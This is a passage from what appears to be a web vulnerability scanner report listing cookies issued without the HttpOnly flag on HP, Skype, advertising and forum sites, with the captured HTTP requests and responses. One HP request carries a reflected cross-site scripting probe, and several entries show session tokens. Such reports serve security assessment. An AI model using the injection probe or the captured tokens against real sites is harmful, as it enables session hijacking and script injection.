
Severity:   Low
Confidence:   Firm
Host:   http://afe.specificclick.net
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?l=19240&sz=728x90&wr=j&t=j&u=&r=&rnd=866277&pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBmXFbWzRkTvLDM4b6jATmwYzDAp-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE_aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc19mb3JtYXR0ZXh0mAKQA8ACBMgClZHuC6gDAfUDAAAARA%26num%3D1%26sig%3DAOD64_2pvgsUrFnwQ-b8TFRVylH69pmqSw%26client%3Dca-pub-3440800076797949%26adurl%3D HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3440800076797949&output=html&h=90&slotname=5330033957&w=728&ea=0&flash=10.3.183&url=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Ftryit.asp%3Ffilename%3Dtryjs_formattext&dt=1315189888684&bpp=18&shv=r20110824&jsv=r20110719&correlator=1315189888728&frm=7&adk=716720423&ga_vid=1478965365.1315189423&ga_sid=1315189423&ga_hid=1126246809&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=verdana&dfs=12&biw=1266&bih=910&ifk=4040782425&fu=4&ifi=3&dtd=64
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=76c8b6bd9362121274a3e06817e9

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=76c8d7f07f77d55df225a1ee0abb; Path=/
Content-Type: application/javascript;charset=ISO-8859-1
Date: Mon, 05 Sep 2011 02:30:53 GMT
Content-Length: 1093

document.write('<iframe src="http://afe.specificclick.net/serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBmXFbWzRkTvLDM4b6jATmwYz
...[SNIP]...

11.2. http://ecustomeropinions.com/survey/survey.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ecustomeropinions.com
Path:   /survey/survey.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /survey/survey.php?sid=603736412&data1=5.5.0.115&data2=xss.cx HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: ecustomeropinions.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:08:19 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: server=www18; path=/
Set-Cookie: PHPSESSID=mgd0vgc60sr4gk9t1ql92arlu3; path=/
Pragma: no-cache
P3P: CP="NOI DSP COR ADM DEV PSA PSD OUR IND COM NAV"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta htt
...[SNIP]...

11.3. http://h10088.www1.hp.com/cda/gap/display/main/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://h10088.www1.hp.com
Path:   /cda/gap/display/main/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cda/gap/display/main/index.jsp HTTP/1.1
Host: h10088.www1.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Server: Apache
Cache-Control: max-age=0
Content-Length: 563
Content-Type: text/html;charset=UTF-8
Date: Sun, 04 Sep 2011 16:30:55 GMT
Connection: close
Set-Cookie: JSESSIONID=F5C057583C685D19DF9ED60569BD1A61.g2u0831c_16; Path=/cda

<html>
<head>
   <title>Error</title>
   <meta http-equiv="content-type" content="text/html;charset=ISO-8859-1">
   <META NAME="generator" content="sezame">
   <META NAME="robots" CONTENT="index,follow">
...[SNIP]...

11.4. http://h30187.www3.hp.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://h30187.www3.hp.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 16:31:11 GMT
Server: nginx
Set-Cookie: hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; path=/; expires=Fri, 22-Sep-2079 19:45:17 GMT
Vary: Accept-Encoding
X-Cluster-Member: hplc05.ec2.powered.com
X-Nginx-Member: hplc05.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 63660
Connection: Close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
Learning center
...[SNIP]...

11.5. http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://h30187.www3.hp.com
Path:   /campus/p/campusId/10640/Graphic_arts.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campus/p/campusId/10640/Graphic_arts.htm HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 16:31:19 GMT
Server: nginx
Set-Cookie: hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; path=/; expires=Fri, 22-Sep-2079 19:45:25 GMT
Vary: Accept-Encoding
X-Cluster-Member: hplc05.ec2.powered.com
X-Nginx-Member: hplc05.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 56488
Connection: Close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
Learning center
...[SNIP]...

11.6. http://h30187.www3.hp.com/howto_QL_courses.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://h30187.www3.hp.com
Path:   /howto_QL_courses.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /howto_QL_courses.jsp?contentType=How-to+in+2&mcid=explore-create HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 16:31:22 GMT
Server: nginx
Set-Cookie: hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; path=/; expires=Fri, 22-Sep-2079 19:45:29 GMT
Vary: Accept-Encoding
X-Cluster-Member: hplc05.ec2.powered.com
X-Nginx-Member: hplc05.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 125944
Connection: Close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
Learning center
...[SNIP]...

11.7. http://h30187.www3.hp.com/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://h30187.www3.hp.com
Path:   /index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.jsp HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 16:31:13 GMT
Server: nginx
Set-Cookie: hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; path=/; expires=Fri, 22-Sep-2079 19:45:20 GMT
Vary: Accept-Encoding
X-Cluster-Member: hplc05.ec2.powered.com
X-Nginx-Member: hplc05.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 63350
Connection: Close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
Learning center
...[SNIP]...

11.8. http://h30187.www3.hp.com/pv.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://h30187.www3.hp.com
Path:   /pv.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pv.gif?s=null&cid=700&u=http%3A%2F%2Fh30187.www3.hp.com%2Findex.jspca059%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Eaf8ce681eb5&nocache=1315176274807 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.6.1_rc3
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=4; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r11575; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392C1E4830C54ECB49A6E4104218808A781F7C4F8A19AB96069A029839FFE95A122B91AE95A1A2770D491AC17E946292851; JSESSIONID=abcu_31OsxeEtfZ2jN2it; EMID=

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 22:44:10 GMT
Server: nginx
Set-Cookie: hplcpsession.login.id=#Q6jOgCQRcMA=; path=/; expires=Sat, 23-Sep-2079 01:58:17 GMT
X-Cluster-Member: hplc02.ec2.powered.com
X-Nginx-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 0
Connection: keep-alive


11.9. https://login.skype.com/account/password-reset-request  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://login.skype.com
Path:   /account/password-reset-request

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /account/password-reset-request?setlang=en&intsrc=client%7Cforgot-pword HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: login.skype.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: skype-login=hvd1f0nqsu93kvs6dhba2diop2; skype-session-token=94fd441852b9e1046c98536f973599d688791fc3; SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 18:00:25 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: skype-session-token=94fd441852b9e1046c98536f973599d688791fc3; path=/; domain=.skype.com
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; expires=Mon, 03-Sep-2012 18:00:26 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Content-Length: 42065
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr
...[SNIP]...

11.10. https://login.skype.com/password-reset-request  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://login.skype.com
Path:   /password-reset-request

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /password-reset-request?setlang=en&intsrc=client%7Cforgot-pword HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0
Host: login.skype.com

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 20:59:15 GMT
Server: Apache
Set-Cookie: skype-login=t86pb1r0mu6sbpo95hdcctf9i7; path=/; domain=.skype.com; secure; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; path=/; domain=.skype.com
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; expires=Mon, 03-Sep-2012 20:59:15 GMT; path=/; domain=.skype.com
Location: https://login.skype.com/account/password-reset-request?setlang=en&intsrc=client%7Cforgot-pword
Vary: User-Agent,Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html


11.11. https://mpsnare.iesnare.com/snare.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://mpsnare.iesnare.com
Path:   /snare.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /snare.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Cookie: token=XnRHGFdzDJ8Inb%2Fhay3wwALOAzXiYWksbDCgNf6jldU%3D
Host: mpsnare.iesnare.com
Connection: Keep-Alive
Cache-Control: no-cache
Referer: https://login.skype.com/account/login-form?product-type=package-global-region-landline-eu-unlimited&application=subscription&return_url=https%3A%2F%2Fsecure.skype.com%2Faccount%2Flogin
Accept-Language: en-US

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:19:13 GMT
Server: Apache/2.2.3 (CentOS) mod_perl/2.0.4 Perl/v5.8.8
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: token=XnRHGFdzDJ8Inb%2Fhay3wwALOAzXiYWksbDCgNf6jldU%3D; domain=iesnare.com; path=/; expires=Wed, 01-Sep-2021 21:19:13 GMT; secure
p3p: CP="NON DSP COR CURa"
Keep-Alive: timeout=2, max=81
Connection: Keep-Alive
Content-Type: text/javascript
Expires: Sun, 04 Sep 2011 21:19:13 GMT
Content-Length: 29952

/* Copyright(c) 2009, iovation, inc. All rights reserved. Version: 3.0.0 */ window.io_last_error="";function isRipEnabled(){return window.io_enable_rip;}function contentUrl(){return __if_b(_i_f);}func
...[SNIP]...

11.12. http://pixel.adsafeprotected.com/jspix  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jspix?anId=144&pubId=19240&campId=161441 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://afe.specificclick.net/serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8ytAZ-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE5aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B600F18284A9B6B8956E4E27118E3C99; Path=/
Content-Type: text/javascript
Date: Mon, 05 Sep 2011 02:30:54 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://afe.specificclick.net/serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3D
...[SNIP]...

11.13. https://secure.skype.com/account/buy/package  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.skype.com
Path:   /account/buy/package

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /account/buy/package?product-type=package-global-region-landline-eu-unlimited HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gzip, deflate
Cookie: skype-login=t86pb1r0mu6sbpo95hdcctf9i7; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; VISITORID=1344388383; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315171085:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0
Host: secure.skype.com
Connection: Keep-Alive
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Response

HTTP/1.1 302 Found
Server: nginx
Date: Sun, 04 Sep 2011 21:27:09 GMT
Content-Type: text/html
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: skype-session-token=f351873bd098dac73b255b59a575ed557e0946bf; path=/; domain=.skype.com
Set-Cookie: skype-session=deleted; expires=Sat, 04-Sep-2010 21:27:08 GMT; path=/; domain=.skype.com; secure
Set-Cookie: skype-session=deleted; expires=Sat, 04-Sep-2010 21:27:08 GMT; path=/; secure
Set-Cookie: skype-session-token=deleted; expires=Sat, 04-Sep-2010 21:27:08 GMT; path=/; domain=.skype.com; secure
Set-Cookie: return-account=https%3A%2F%2Fsecure.skype.com%2Faccount%2Fbuy%2Fpackage%3Fproduct-type%3Dpackage-global-region-landline-eu-unlimited; path=/
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315171085:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; expires=Mon, 03-Sep-2012 21:27:09 GMT; path=/
Location: https://secure.skype.com/account/login?product-type=package-global-region-landline-eu-unlimited&application=subscription
Vary: User-Agent,Accept-Encoding
Content-Length: 0


11.14. https://secure.skype.com/account/login  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.skype.com
Path:   /account/login

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /account/login?product-type=package-global-region-landline-eu-unlimited&application=subscription HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: secure.skype.com
Connection: Keep-Alive
Cookie: skype-login=t86pb1r0mu6sbpo95hdcctf9i7; skype-session-token=f351873bd098dac73b255b59a575ed557e0946bf; VISITORID=1344388383; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315171085:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; skype-session=l5p5g0er47bh75g44j3p4n46h7; return-account=https%3A%2F%2Fsecure.skype.com%2Faccount%2Fbuy%2Fpackage%3Fproduct-type%3Dpackage-global-region-landline-eu-unlimited; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315171085:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0

Response

HTTP/1.1 302 Found
Server: nginx
Date: Sun, 04 Sep 2011 21:27:09 GMT
Content-Type: text/html
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: skype-session-token=f351873bd098dac73b255b59a575ed557e0946bf; path=/; domain=.skype.com
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315171085:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; expires=Mon, 03-Sep-2012 21:27:09 GMT; path=/
Location: https://login.skype.com/account/login-form?product-type=package-global-region-landline-eu-unlimited&application=subscription&return_url=https%3A%2F%2Fsecure.skype.com%2Faccount%2Flogin
Vary: User-Agent,Accept-Encoding
Content-Length: 0


11.15. https://support.skype.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://support.skype.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170217:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-login=t86pb1r0mu6sbpo95hdcctf9i7; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824
Host: support.skype.com

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 21:03:38 GMT
Set-Cookie: JSESSIONID=C51B9013C862C1913F4926F5DFFB3B93; Path=/; Secure
Set-Cookie: skypeSessionId=C51B9013C862C1913F4926F5DFFB3B93; Path=/
Location: https://support.skype.com/en-us/
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain


11.16. http://www.demosondemand.com/shared_components/javascript/launchDemoStage3PlayerClient_js.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.demosondemand.com
Path:   /shared_components/javascript/launchDemoStage3PlayerClient_js.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shared_components/javascript/launchDemoStage3PlayerClient_js.asp HTTP/1.1
Host: www.demosondemand.com
Proxy-Connection: keep-alive
Referer: http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php?&a=google-na_WebAppFirewallWW_WebApplicationSecurity&kw=web%20application%20security&gclid=CP2344L_g6sCFUsaQgodmjw72Q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:18:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1655
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSCBRACDB=MDAFPIDBCNGIHBMKEPNKOOLA; path=/
Cache-control: private


function launchDemoStage3Player(session_id, promotion_id,startTime,reseller_id )
{
       var initialW = 250;
var initialH = 200;
var x = (screen.width/2)-initialW/2;
var y
...[SNIP]...

11.17. http://www.wallstreetoasis.com/forums/houlihan-lokey-exit-opps  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.wallstreetoasis.com
Path:   /forums/houlihan-lokey-exit-opps

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forums/houlihan-lokey-exit-opps HTTP/1.1
Host: www.wallstreetoasis.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:14:09 GMT
Server: Apache/2.2.8 (Ubuntu)
X-Powered-By: PHP/5.2.4-2ubuntu5.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
X-Drupal-Cache: MISS
Set-Cookie: SESS9095464dfa38d76be5c0e87191926453=ba27f64d25c838f1de7819db7dc7e5ce; expires=Tue, 27 Sep 2011 19:47:29 GMT; path=/; domain=.wallstreetoasis.com
Last-Modified: Sun, 04 Sep 2011 16:14:09 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 161677


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<met
...[SNIP]...

11.18. http://142.xg4ken.com/media/redir.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://142.xg4ken.com
Path:   /media/redir.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/redir.php?prof=6&camp=4190&affcode=kw93350&cid=7516966884&networkType=search&k_clickid=AMS|_kenshoo_clickid_&url[]=https%3A%2F%2Fh41183.www4.hp.com%2Finflexion%2F%3Fcountry%3DUS%26language%3DUS%26campaigncode%3Dinflexion%26jumpid%3Dinflexion HTTP/1.1
